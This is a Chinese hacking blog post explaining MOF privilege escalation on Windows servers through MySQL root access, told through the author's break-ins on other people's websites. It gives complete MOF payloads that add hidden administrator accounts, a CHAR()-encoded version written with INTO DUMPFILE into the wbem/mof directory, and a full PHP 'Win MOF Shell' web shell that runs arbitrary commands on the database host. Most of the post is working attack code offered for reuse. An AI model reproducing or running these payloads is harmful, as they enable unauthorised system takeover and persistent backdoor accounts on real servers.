Mof提权科普

今天再拿一个站的时候遇到了很多问题,拿站的过程就不说了,其中要用到mof提权,不管能不能提下,我进行一个mof提权的科普

这里我综合各类mof提权进行了 综合

首先说一下,无shell情况下的mysql远程mof提权利用方法详解

就是你注入拿到了数据库的root账号密码,直接进行

扫到一个站的注入


在havij中得到mysql数据库中mysql库保存的数据库密码: 


有时候发现1.15版的还是最好用,最稳定,虽然速度慢了一点。 
照样放到坛子里让机油破了 


感谢Mr.Lu。顺便吐槽下,cmd5连个root都要收费。。。 
在等着密码破解出来的时候顺便nmap了一下 


意外发现端口改到了1126,给后面省下了不少时间。 
照常外连试试 


上个帖子里面有基友问这个软件是什么,我用的是navicat,感觉很好用的 
现在的常规思路就是得到绝对路径,写一个小马,再进一步渗透。 
但是网站上面暴不出路径,看看mysql的路径 
用select @@basedir;命令可以看到; 


网站的路径大概差不多了,懒得一个一个试了,最近mof提权挺火的,上次失败了一次,这次再来试试好了。 
Mof的科普文很多, 

mof文件内容为:

#pragma namespace("\\\\.\\root\\subscription")instance of __EventFilter as $EventFilter{    EventNamespace = "Root\\Cimv2";    Name  = "filtP2";    Query = "Select * From __InstanceModificationEvent "            "Where TargetInstance Isa \"Win32_LocalTime\" "            "And TargetInstance.Second = 5";    QueryLanguage = "WQL";};instance of ActiveScriptEventConsumer as $Consumer{    Name = "consPCSV2";    ScriptingEngine = "JScript";    ScriptText =    "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")"; };instance of __FilterToConsumerBinding{    Consumer   = $Consumer;    Filter = $EventFilter;};

 

由于没有马,不能按照网盘里面说的先传一个mof上去,我就直接一次性写入。
先是试了试直接将原来的语句写入,提示失败,原因就是语句里面很多";回车"之类的符号。
然后就想转化为16进制或者asc码这样。
先试了16进制。
等了老半天什么还是登陆不上去,就放弃了,改用asc码,用的sql语句为:

 

SELECT CHAR(35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98,115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,116,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101,110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97,109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,116,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,110,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32,32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114,32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,67,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105,112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108,108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,117,115,101,114,32,97,100,109,105,110,32,97,100,109,105,110,32,47,97,100,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) INTO dumpfile  'c:/windows/system32/wbem/mof/nullevt.mof';


这时候才意识到一个问题,上面的语句只添加了用户,忘了提升为管理员了。。。 
好吧,重新写一遍mof

 

select char(35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98,115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,116,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101,110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97,109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,116,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,110,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32,32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114,32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,67,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105,112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108,108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,108,111,99,97,108,103,114,111,117,112,32,97,100,109,105,110,105,115,116,114,97,116,111,114,115,32,97,100,109,105,110,32,47,97,100,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) into dumpfile  'c:/windows/system32/wbem/mof/nullevt.mof';

 

好了,这样就顺利登进去了;

改天研究一下一次性完成添加管理员试试

现在默认它还是会过5s添加一次用户,解决方法就是:
第一 net stop winmgmt 停止服务,
第二 删除文件夹:C:\WINDOWS\system32\wbem\Repository\
第三 net start winmgmt 启动服务
还有其他方法在网盘的文件里面有写。

一路看起来挺顺利的,是因为上次研究过这个。这次写的详细点了。

 

 

第二种

 

首先呢先谢谢米爷在我弄这个的时候把我骂开窍了- -。

不多说了~。~像名称一样哈~

首先呢是朋友扔我一shell

他提权差就给咱了,简单的看了下,是php脚本的,一看php脚本就肯定带有,mysql。

就在网站目录看了下data文件夹习惯性的~

运气不错。Root。

居然知道是这东西,上大马。(不知道利用菜刀)

OK回显成功。

5.0.67不用说都知道是什么了,这版本基本上udf都可以秒的,但毕竟这里说的是mof所以就用mof提吧。

先找个可写路径。

C盘可以,运气不错。

然后在上传路径传个我们的mof文件

代码如下:

#pragmanamespace("\\\\.\\root\\subscription")

   

instance of __EventFilter as $EventFilter

{

   EventNamespace = "Root\\Cimv2";

   Name  = "filtP2";

   Query = "Select * From __InstanceModificationEvent "

           "Where TargetInstance Isa \"Win32_LocalTime\" "

           "And TargetInstance.Second = 5";

   QueryLanguage = "WQL";

};

   

instance of ActiveScriptEventConsumer as$Consumer

{

   Name = "consPCSV2";

   ScriptingEngine = "JScript";

   ScriptText =

   "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exenet user user$ sword /add & net localgroup administrators user$ /add\")";

};

   

instance of __FilterToConsumerBinding

{

   Consumer   = $Consumer;

   Filter = $EventFilter;

};

生成的账号:user$ 密码为:sword

这段代码可自行修改。

接着呢执行命令:selectload_file('C:\\RECYCLER\\xx.mof') into dumpfile 'c:/windows/system32/wbem/mof/xx.mof';

OK.。执行命令完成。

由于权限设置无法直接查询管理员。登陆下就知道了。

好了mof提权就这样。

谢谢观看。

Ps:由于当时提的时候截的几张图,后来管理员把mof的漏洞修复了。所以服务器没了。就这样~

综合一下 

还可直接使用mof马进行提权

但是我经常被杀

下面贴出代码,直接保存mof.php,即可

运行的时候点read,多运行几次 ,因为read没有回显是没运行成功,如果出现错误他会,有回显的

<?php$path="c:/windows/system32/canimei";session_start();if(!empty($_POST['submit'])){setcookie("connect");setcookie("connect[host]",$_POST['host']);setcookie("connect[user]",$_POST['user']);setcookie("connect[pass]",$_POST['pass']);setcookie("connect[dbname]",$_POST['dbname']);echo "<script>location.href='?action=connect'</script>";}if(empty($_GET["action"])){?><html><head><title>Win MOF Shell</title></head><body><formaction="?action=connect"method="post">Host:<inputtype="text"name="host"value="192.168.200.144:3306"><br/>User:<inputtype="text"name="user"value="root"><br/>Pass:<inputtype="password"name="pass"value="toor"><br/>DB:<inputtype="text"name="dbname"value="mysql"><br/><inputtype="submit"name="submit"value="Submit"><br/></form></body></html><?phpexit;}if($_GET[action]=='connect'){$conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"])ordie('<pre>'.mysql_error().'</pre>'); echo "<form action='' method='post'>";echo "Cmd:";echo "<input type='text' name='cmd' value='$strCmd'?>";echo "<br>";echo "<br>";echo "<inputtype='submit'value='Exploit'>";echo "</form>";echo "<formaction=''method='post'>";echo "<inputtype='hidden'name='flag'value='flag'>";echo "<inputtype='submit'value=' Read  '>";echo "</form>";if (isset($_POST['cmd'])){$strCmd=$_POST['cmd'];$cmdshell='cmd /c '.$strCmd.'>'.$path;$mofname="c:/windows/system32/wbem/mof/system.mof";$payload = "#pragma namespace(\"\\\\\\\\\\\\\\\\.\\\\\\\\root\\\\\\\\subscription\")instance of __EventFilter as \$EventFilter{  EventNamespace = \"Root\\\\\\\\Cimv2\";  Name  = \"filtP2\";  Query = \"Select * From __InstanceModificationEvent \"      \"Where TargetInstance Isa \\\\\"Win32_LocalTime\\\\\" \"      \"And TargetInstance.Second = 5\";  QueryLanguage = \"WQL\";};instance of ActiveScriptEventConsumer as \$Consumer{  Name = \"consPCSV2\";  ScriptingEngine = \"JScript\";  ScriptText =  \"var WSH = new ActiveXObject(\\\\\"WScript.Shell\\\\\")\\\\nWSH.run(\\\\\"$cmdshell\\\\\")\"; };instance of __FilterToConsumerBinding{  Consumer = \$Consumer;  Filter = \$EventFilter;};";mysql_select_db($_COOKIE["connect"]["dbname"],$conn);$sql1="select '$payload' into dumpfile '$mofname';";if(mysql_query($sql1))  echo "<hr>Execute Successful!<br> Please click the read button to check the  result!!<br>If the result is not correct,try read again later<br><hr>"; else die(mysql_error()); mysql_close($conn);}if(isset($_POST['flag'])){  $conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"])  or die('<pre>'.mysql_error().'</pre>');   $sql2="select load_file(\"".$path."\");";  $result2=mysql_query($sql2);  $num=mysql_num_rows($result2);  while ($row = mysql_fetch_array($result2, MYSQL_NUM)) {    echo "<hr/>";    echo '<pre>'. $row[0].'</pre>';  }  mysql_close($conn);}}?>

posted @ 2016-01-23 17:48 h4ck0ne 阅读(...) 评论(...) 编辑 收藏